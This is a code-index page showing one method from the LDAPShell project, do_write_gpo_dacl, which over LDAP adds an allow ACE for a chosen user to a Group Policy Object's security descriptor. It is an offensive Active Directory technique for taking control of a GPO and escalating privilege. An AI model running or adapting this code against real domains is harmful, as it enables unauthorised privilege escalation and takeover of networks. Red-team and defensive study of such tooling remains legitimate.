MCPcopy Index your code
hub / github.com/XiaoliChan/LDAPShell / do_write_gpo_dacl

Method do_write_gpo_dacl

utils/ldap_shell.py:92–123  ·  view source on GitHub ↗
(self, line)

Source from the content-addressed store, hash-verified

90 return nace
91
92 def do_write_gpo_dacl(self, line):
93 args = shlex.split(line)
94 print ("Adding %s to GPO with GUID %s" % (args[0], args[1]))
95 if len(args) != 2:
96 raise Exception("A samaccountname and GPO sid are required.")
97
98 tgtUser = args[0]
99 gposid = args[1]
100 self.client.search(self.domain_dumper.root, '(&(objectclass=person)(sAMAccountName=%s))' % tgtUser, attributes=['objectSid'])
101 if len( self.client.entries) <= 0:
102 raise Exception("Didnt find the given user")
103
104 user = self.client.entries[0]
105
106 controls = security_descriptor_control(sdflags=0x04)
107 self.client.search(self.domain_dumper.root, '(&(objectclass=groupPolicyContainer)(name=%s))' % gposid, attributes=['objectSid','nTSecurityDescriptor'], controls=controls)
108
109 if len( self.client.entries) <= 0:
110 raise Exception("Didnt find the given gpo")
111 gpo = self.client.entries[0]
112
113 secDescData = gpo['nTSecurityDescriptor'].raw_values[0]
114 secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
115 newace = self.create_allow_ace(str(user['objectSid']))
116 secDesc['Dacl']['Data'].append(newace)
117 data = secDesc.getData()
118
119 self.client.modify(gpo.entry_dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
120 if self.client.result["result"] == 0:
121 print('LDAP server claims to have taken the secdescriptor. Have fun')
122 else:
123 raise Exception("Something wasnt right: %s" %str(self.client.result['description']))
124
125 def do_add_computer(self, line):
126 args = shlex.split(line)

Callers

nothing calls this directly

Calls 2

create_allow_aceMethod · 0.95
searchMethod · 0.80

Tested by

no test coverage detected